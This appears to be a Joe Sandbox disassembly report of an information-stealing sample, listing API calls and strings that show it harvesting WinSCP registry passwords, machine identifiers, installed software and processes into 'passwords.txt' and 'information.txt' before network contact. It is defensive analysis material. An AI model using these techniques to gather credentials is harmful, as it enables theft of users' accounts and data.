Host: , xrefs: 0040E32A
Login: , xrefs: 0040E459
Password, xrefs: 0040E515
Soft: WinSCP, xrefs: 0040E2FE
HostName, xrefs: 0040E367
UserName, xrefs: 0040E496
Password: , xrefs: 0040E529
Software\Martin Prikryl\WinSCP 2\Configuration, xrefs: 0040E20B
UseMasterPassword, xrefs: 0040E24E
PortNumber, xrefs: 0040E3BD

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: _memset$Value$Open$Enum
String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
API String ID: 3303087153-2798830873
Opcode ID: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction ID: 1c66541d4828bd9326f921050ea70c7b79589cb9660c5b8585550bf775721ac0
Opcode Fuzzy Hash: 9cb75a7071ecb74fff9e56ced005ca6b64a065f8bcd1bf242cfed6becfa28f4e
Instruction Fuzzy Hash: B5D1D6B295012DAADF20EB91DC42BD9B778AF04308F5018EBA508B3151DA747FC9CFA5

Function 00418643 Relevance: 48.2, APIs: 32, Instructions: 154
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00418684
GetProcAddress.KERNEL32 ref: 0041869B
GetProcAddress.KERNEL32 ref: 004186B2
GetProcAddress.KERNEL32 ref: 004186C9
GetProcAddress.KERNEL32 ref: 004186E0
GetProcAddress.KERNEL32 ref: 004186F7
GetProcAddress.KERNEL32 ref: 0041870E
GetProcAddress.KERNEL32 ref: 00418725
GetProcAddress.KERNEL32 ref: 0041873C
GetProcAddress.KERNEL32 ref: 00418753
GetProcAddress.KERNEL32 ref: 0041876A
GetProcAddress.KERNEL32 ref: 00418781
GetProcAddress.KERNEL32 ref: 00418798
GetProcAddress.KERNEL32 ref: 004187AF
GetProcAddress.KERNEL32 ref: 004187C6
GetProcAddress.KERNEL32 ref: 004187DD
GetProcAddress.KERNEL32 ref: 004187F4
GetProcAddress.KERNEL32 ref: 0041880B
GetProcAddress.KERNEL32 ref: 00418822
GetProcAddress.KERNEL32 ref: 00418839
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041884A
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041885B
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041886C
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041887D
LoadLibraryA.KERNEL32(?,004184C2), ref: 0041888E
GetProcAddress.KERNEL32(75670000,004184C2), ref: 004188AA
GetProcAddress.KERNEL32(75750000,004184C2), ref: 004188C5
GetProcAddress.KERNEL32 ref: 004188DC
GetProcAddress.KERNEL32(76BE0000,004184C2), ref: 004188F7
GetProcAddress.KERNEL32(759D0000,004184C2), ref: 00418912
GetProcAddress.KERNEL32(773F0000,004184C2), ref: 0041892D
GetProcAddress.KERNEL32 ref: 00418944

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction ID: 2c76b628124a1797fdce28c748a09696ce6250a2eaa67b4899ff399dadce2328
Opcode Fuzzy Hash: 4153ecd493db34a1094e14b788043fe07f5e2afe7ddd22b5ff6fe96697fb63f9
Instruction Fuzzy Hash: 96711675910312AFEF1ADF60FD088243BA7F70874BF10A426E91582270EB374A64EF55

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416E97: CreateThread.KERNEL32(00000000,00000000,00416DC6,?,00000000,00000000), ref: 00416F36
Part of subcall function 00416E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00416F3E

Strings

User Name: , xrefs: 0041400E
[Hardware], xrefs: 0041420D
VideoCard: , xrefs: 004143B7
Path: , xrefs: 00413DBB
RAM: , xrefs: 00414350
Version: , xrefs: 00413B9F
Threads: , xrefs: 004142EF
Processor: , xrefs: 0041422D
HWID: , xrefs: 00413D4E
Date: , xrefs: 00413C1F
Windows: , xrefs: 00413E70
MachineID: , xrefs: 00413C80
AV: , xrefs: 00413F3E
information.txt, xrefs: 00414573
[Software], xrefs: 004144A3
Work Dir: In memory, xrefs: 00413E30
GUID: , xrefs: 00413CE1
Keyboard Languages: , xrefs: 004140DE
Display Resolution: , xrefs: 0041406F
Cores: , xrefs: 0041428E
[Processes], xrefs: 0041442A
Computer Name: , xrefs: 00413FAD
TimeZone: , xrefs: 004141AC
Install Date: , xrefs: 00413ED1
Local Time: , xrefs: 0041414B

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 681701770-1014693891
Opcode ID: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction ID: 792dbb826b946587ba76db5a11b028a2a1d9662385358a0031bce88e61b043bf
Opcode Fuzzy Hash: 6126670baf250b2cd161e8f14be422fa99acf7c1130f51379d98b343847bea79
Instruction Fuzzy Hash: 2A527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 38.7, APIs: 8, Strings: 14, Instructions: 249
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417174,004366CF,004366CE,?,?,?,?,0041858F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AA0
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AF9
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B59
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BB2
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BC8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BDE
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BF0
Sleep.KERNEL32(0000EA60), ref: 00416BFF

Strings

ERROR, xrefs: 00416BC0
sqlp.dll, xrefs: 00416CCD
.vA, xrefs: 00416D1D
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CDF
sqlite3.dll, xrefs: 00416C9C
ERROR, xrefs: 00416BD6
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416CAE
ERROR, xrefs: 00416BE8
ERROR, xrefs: 00416BAA
sqlp.dll, xrefs: 00416CFE
sqlite3.dll, xrefs: 00416C68
ERROR, xrefs: 00416AF1
ERROR, xrefs: 00416B51
ERROR, xrefs: 00416A98

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrlen$lstrcpy$Sleep
String ID: .vA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$sqlite3.dll$sqlite3.dll$sqlp.dll$sqlp.dll
API String ID: 2840494320-4129404369
Opcode ID: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction ID: 3295cb3038e640ef7bf1334207e300efc9412b34fd4a8ee3f001cefdb945b7ae
Opcode Fuzzy Hash: a45e317464bf1edbde2a90d5a52dd523743f320969f0b5af628d37bda6730293
Instruction Fuzzy Hash: A9915F31E40119ABCF10FBA6ED47ACC7770AF04308F51502BF915B7191DBB8AE898B98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0041709C,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004175E9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004170BA,00436C18,00000000,004366CD,?,?,?,?,0041858F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001,00437198,004367C6,?,?,?), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000003.00000002.2123509648.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2123509648.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000055D000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000563000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000582000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.00000000005A1000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.000000000063A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2123509648.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID: passwords.txt
API String ID: 1956182324-347816968
Opcode ID: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction ID: 9a12f6b0eacbcb2ed4cda68e664cf834d7366407d3e9ed4d657f0b87806d2d42
Opcode Fuzzy Hash: e79cd5a6fe499fb7965201bd0776ad43c7a927167085e3e7bd657c15f75794a8
Instruction Fuzzy Hash: A2814032900208AFCF05FFA1EE4A9CD7B76BF08316F205026F501B31A1EB7A5E559B59

Function 00404B2E Relevance: 35.4, APIs: 12, Strings: 8, Instructions: 378
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417621), ref: 00410538

Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AE8
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AEE
Part of subcall function 00404AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00404AF4
Part of subcall function 00404AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00404B06
Part of subcall function 00404AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00404B0E

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041707B,004366CD,?,?,?,?,0041858F), ref: 0041050D

InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00404BCD
StrCmpCA.SHLWAPI(?), ref: 00404BEB
